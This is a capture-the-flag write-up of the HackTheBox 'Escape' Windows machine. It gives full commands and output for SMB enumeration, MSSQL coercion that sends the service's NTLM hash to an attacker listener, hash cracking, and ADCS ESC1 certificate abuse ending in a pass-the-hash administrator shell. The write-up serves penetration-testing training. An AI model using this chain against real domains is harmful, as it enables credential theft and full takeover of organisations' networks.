HackTheBox - Escape | Aditya Telange

Box Info

Name: Escape
OS: Windows
Difficulty: Medium
IP: 10.10.11.202
Machine Creator: Geiseric

Introduction

Escape is a medium-difficulty Windows machine on Hack The Box that revolves around Active Directory. The initial foothold is gained by finding credentials in a PDF file on an open SMB share. This access is then leveraged to connect to an MSSQL service, from which we capture and crack the NTLM hash of a service account. Lateral movement is achieved by discovering another user’s credentials in a log file. Finally, privilege escalation to Administrator is accomplished by exploiting a misconfiguration in Active Directory Certificate Services (ADCS), specifically the ESC1 vulnerability.

Scanning and Enumeration

Nmap Scan

We start with a basic Nmap scan to identify open ports and services running on the target machine.

sudo nmap -n -v -Pn -sC -sV -oN nmap.txt 10.10.11.202

# Nmap 7.95 scan initiated Wed Jul  2 10:21:36 2025 as: /usr/lib/nmap/nmap -n -v -Pn -sC -sV -oN nmap.txt 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.13s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-02 21:59:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  2 10:23:22 2025 -- 1 IP address (1 host up) scanned in 105.64 seconds

full nmap output

We get the following information from the scan:

Open Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 1433, 3268, 3269, and 5985.
Services: DNS, Kerberos, MSRPC, NetBIOS, LDAP, MSSQL, and HTTPAPI.
Operating System: Microsoft Windows Server 2019.
Active Directory: Domain - sequel.htb and DC - dc.sequel.htb.

We now add the target to our /etc/hosts file for easier access:

10.10.11.202 dc.sequel.htb sequel.htb

Foothold

Looking at the Nmap scan we can confim that this is a Windows machine with Active Directory services running.

SMB Enumeration

We have no credentials yet, so we will start by enumerating SMB service using guest user credentials.

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'a' -p ''
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\a: (Guest)

We can see that we have access to the sequel.htb domain with guest credentials.

Enumerating users using nxc’s rid-brute module:

We find users:

1000: sequel\DC$ (SidTypeUser)
1101: sequel\DnsAdmins (SidTypeAlias)
1102: sequel\DnsUpdateProxy (SidTypeGroup)
1103: sequel\Tom.Henn (SidTypeUser)
1104: sequel\Brandon.Brown (SidTypeUser)
1105: sequel\Ryan.Cooper (SidTypeUser)
1106: sequel\sql_svc (SidTypeUser)
1107: sequel\James.Roberts (SidTypeUser)
1108: sequel\Nicole.Thompson (SidTypeUser)
1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)

We can now enumerate the shares available on the target machine.

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'a' -p '' --shares
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\a: (Guest)
SMB         10.10.11.202    445    DC               [*] Enumerated shares
SMB         10.10.11.202    445    DC               Share           Permissions     Remark
SMB         10.10.11.202    445    DC               -----           -----------     ------
SMB         10.10.11.202    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.202    445    DC               C$                              Default share
SMB         10.10.11.202    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.202    445    DC               NETLOGON                        Logon server share
SMB         10.10.11.202    445    DC               Public          READ
SMB         10.10.11.202    445    DC               SYSVOL                          Logon server share

We can see that we have access to the Public share. Let’s enumerate it further using smbclient to see if we can find any interesting files.

kali@kali:~/boxes/Escape.htb$ smbclient //10.10.11.202/Public -U a%
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1475930 blocks available
smb: \>

We see one interesting file named SQL Server Procedures.pdf. Let’s download it to our local machine.

smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (57.1 KiloBytes/sec) (average 57.1 KiloBytes/sec)

We can open the PDF file to see if it contains any useful information. On page 2 we find:

This gives us a username PublicUser and a password Gu██████rCantWrite1.

We can now use these credentials to authenticate to the MSSQL service using nxc. (Remember, we need to use the --local-auth flag since we are not using domain credentials.)

kali@kali:~/boxes/Escape.htb$ nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth
MSSQL       10.10.11.202    1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.10.11.202    1433   DC               [+] DC\PublicUser:Gu██████rCantWrite1

We now use responder to capture the NTLM hash of the user which is running the MSSQL service.

kali@kali:~/boxes/Escape.htb$ sudo responder -I tun0

Coercing MSSQL Service to capture NTLM Hash

We can now use nxc to coerce the MSSQL service to authenticate to our responder instance and capture the NTLM hash.

nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth -M mssql_coerce -o LISTENER=10.10.16.31

-u: Username to authenticate with.
-p: Password for the user.
--local-auth: Use local authentication instead of domain authentication.
-M mssql_coerce: Use the MSSQL coerce module to force the MSSQL service to authenticate to our responder instance.
-o LISTENER=10.10.16.31: Specify the IP address of our responder instance to listen for NTLM authentication requests.

kali@kali:~/boxes/Escape.htb$ nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth -M mssql_coerce -o LISTENER=10.10.16.31
MSSQL       10.10.11.202    1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.10.11.202    1433   DC               [+] DC\PublicUser:Gu██████rCantWrite1
MSSQL_CO... 10.10.11.202    1433   DC               [*] Commands executed successfully, check the listener for results

On the responder terminal, we should see the NTLM hash being captured:

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:1477a8036251ce8d:E831360C3DB15470D312ABD86D1FB13A:0101000000000000800F761945EBDB0127C222671E60681000000000020008004E0049005200540001001E00570049004E002D004B004700380041003800350038004A004D005100320004003400570049004E002D004B004700380041003800350038004A004D00510032002E004E004900520054002E004C004F00430041004C00030014004E004900520054002E004C004F00430041004C00050014004E004900520054002E004C004F00430041004C0007000800800F761945EBDB0106000400020000000800300030000000000000000000000000300000DB0C32A828ED9B9428058D4F6FED360FF7215B63396518A0CD474E2AFBFE55940A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00330031000000000000000000
[*] Skipping previously captured hash for sequel\sql_svc
[*] Skipping previously captured hash for sequel\sql_svc

Cracking the NTLM Hash

We can now crack the NTLM hash using hashcat or john.

Running the following on our host machine:

hashcat sql_svc.hash SecLists/Passwords/Leaked-Databases/rockyou.txt

We get the password for the sql_svc user as REGG██████ronnie.

Checking the password against the sql_svc user, we can confirm that it is correct.

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie'
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\sql_svc:REGG██████ronnie

Checking the users in the Remote Management Users group:

kali@kali:~/boxes/Escape.htb$ nxc ldap 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie' --groups "Remote Management Users"
LDAP        10.10.11.202    389    DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
LDAPS       10.10.11.202    636    DC               [+] sequel.htb\sql_svc:REGG██████ronnie
LDAPS       10.10.11.202    636    DC               sql_svc
LDAPS       10.10.11.202    636    DC               Ryan.Cooper

We have 2 users: sql_svc and Ryan.Cooper.

Shell as `sql_svc`

We can now use winrm to connect to the target machine using the sql_svc user.

kali@kali:~/boxes/Escape.htb$ evil-winrm-py -i 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie'
        ▘▜      ▘
    █▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
    ▙▖▚▘▌▐▖  ▚▚▘▌▌▌▌ ▌▌▌  ▙▌▙▌
                          ▌ ▄▌ v1.1.2
[*] Connecting to 10.10.11.202:5985 as sql_svc
evil-winrm-py PS C:\Users\sql_svc\Documents>

There is no user.txt file on the sql_svc’s Deskop.

Lateral Movement

We are now logged in as the sql_svc user. Enumerating more we see a directory SQLServer in C:\ directory.

We have a Error log file in the C:\SQLServer\Logs directory. Let’s check it out.

evil-winrm-py PS C:\SQLServer\Logs> ls

    Directory: C:\SQLServer\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

Downloading the ERRORLOG.BAK file to our local machine:

evil-winrm-py PS C:\SQLServer\Logs> download ERRORLOG.BAK .
Downloading C:\SQLServer\Logs\ERRORLOG.BAK: 64.0kB [00:00, 376MB/s]
[+] File downloaded successfully and saved as: /home/kali/boxes/Escape.htb/ERRORLOG.BAK

Finding Credentials in the Error Log

In the ERRORLOG.BAK file, we find some interesting information, including failed login attempts and the usernames of the users who attempted to log in.

# <----SNIP---->
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMos██████'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
# <----SNIP---->

Full ERRORLOG.BAK

We can infer that the Ryan.Cooper user tried to login and mistakenly pressed the Enter key then entered the password NuclearMos██████.

Trying to login with the Ryan.Cooper user using the password NuclearMos██████:

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMos██████'
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\Ryan.Cooper:NuclearMos██████

We can see that we have successfully authenticated as the Ryan.Cooper user.

Now, using winrm we can get a shell.

evil-winrm-py -i 10.10.11.202 -u ryan.cooper -p NuclearMos██████

Get user.txt:

evil-winrm-py PS C:\Users\Ryan.Cooper\Desktop> cat user.txt
0c8cd01d32ba██████ba42d9410922d8

Privilege Escalation

ADCS is found to be running.

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMos██████' -M enum_ca
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\Ryan.Cooper:NuclearMos██████
ENUM_CA     10.10.11.202    445    DC               Active Directory Certificate Services Found.
ENUM_CA     10.10.11.202    445    DC               http://10.10.11.202/certsrv/certfnsh.asp

Enumerating ADCS Misconfigurations using `certipy`

We now enumerate misconfigs in ADCS using certipy.

kali@kali:~/boxes/Escape.htb$ certipy find -u 'Ryan.Cooper' -p 'NuclearMos██████' -dc-ip 10.10.11.202 -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
# <----SNIP---->
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
# <----SNIP---->
    [+] User Enrollable Principals      : SEQUEL.HTB\Domain Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.

view FULL Output

What is ESC1?

The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity within the certificate’s SAN. This allows the attacker to impersonate any user, including administrators. ¹

Key indicators in the output:

[!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication. => This explicitly flags the vulnerability.
Enrollee Supplies Subject : True => This confirms the setting allowing attacker-defined subjects.
Client Authentication : True => This confirms the certificate can be used for logon.
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users => This confirms the attacker has the necessary rights to request a certificate from this template.
Requires Manager Approval : False and Authorized Signatures Required : 0 => This confirm the absence of preventative issuance controls.

Requesting a certificate using the vulnerable template, injecting the identity of a privileged target.

certipy req \
    -u 'Ryan.Cooper' -p 'NuclearMos██████' \
    -dc-ip '10.10.11.202' -target 'dc.sequel.htb' \
    -ca 'sequel-DC-CA' -template 'UserAuthentication' \
    -upn 'administrator@sequel.htb'

-u: Username to authenticate with.
-p: Password for the user.
-dc-ip: IP address of the Domain Controller.
-target: Target domain controller.
-ca: Name of the certificate authority.
-template: Name of the certificate template to use.
-upn: User Principal Name (UPN) to inject into the certificate request.

Running the command, we get:

kali@kali:~/boxes/Escape.htb$ certipy req \
    -u 'Ryan.Cooper' -p 'NuclearMos██████' \
    -dc-ip '10.10.11.202' -target 'dc.sequel.htb' \
    -ca 'sequel-DC-CA' -template 'UserAuthentication' \
    -upn 'administrator@sequel.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

The certificate is saved as administrator.pfx, which contains both the certificate and the private key.

Using the obtained certificate to authenticate as the target.

certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202

-pfx: Path to the PFX file containing the certificate and private key.
-dc-ip: IP address of the Domain Controller.

We try to authenticate using the certificate we just requested, but we encounter a clock skew error. This is likely because the time on our machine is not synchronized with the target machine.

kali@kali:~/boxes/Escape.htb$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information

We fix this by using:

sudo rdate -n 10.10.11.202

We can now re-attempt to authenticate using the administrator.pfx certificate we obtained earlier.

kali@kali:~/boxes/Escape.htb$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f██████51e5f5e17e1e9f3e58f4ee

certipy successfully authenticated as the administrator user and retrieved the NT hash.

Using the NT hash, we can now connect to the target machine using winrm.

kali@kali:~/boxes/Escape.htb$ evil-winrm-py -i 10.10.11.202 -u administrator -H a52f██████51e5f5e17e1e9f3e58f4ee
        ▘▜      ▘
    █▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
    ▙▖▚▘▌▐▖  ▚▚▘▌▌▌▌ ▌▌▌  ▙▌▙▌
                          ▌ ▄▌ v1.1.2
[*] Connecting to 10.10.11.202:5985 as administrator
evil-winrm-py PS C:\Users\Administrator\Documents>

We can now get the root flag:

evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
12bc39fe2fcfe7326██████1a3e0d208

https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc1-enrollee-supplied-subject-for-client-authentication ↩︎

Introduction#

Scanning and Enumeration#

Nmap Scan#

Foothold#

SMB Enumeration#

Public Share Enumeration#

Coercing MSSQL Service to capture NTLM Hash#

Cracking the NTLM Hash#

Shell as sql_svc#

Lateral Movement#

Finding Credentials in the Error Log#

Privilege Escalation#

Enumerating ADCS Misconfigurations using certipy#

What is ESC1?#

Requesting a certificate using the vulnerable template, injecting the identity of a privileged target.#

Using the obtained certificate to authenticate as the target.#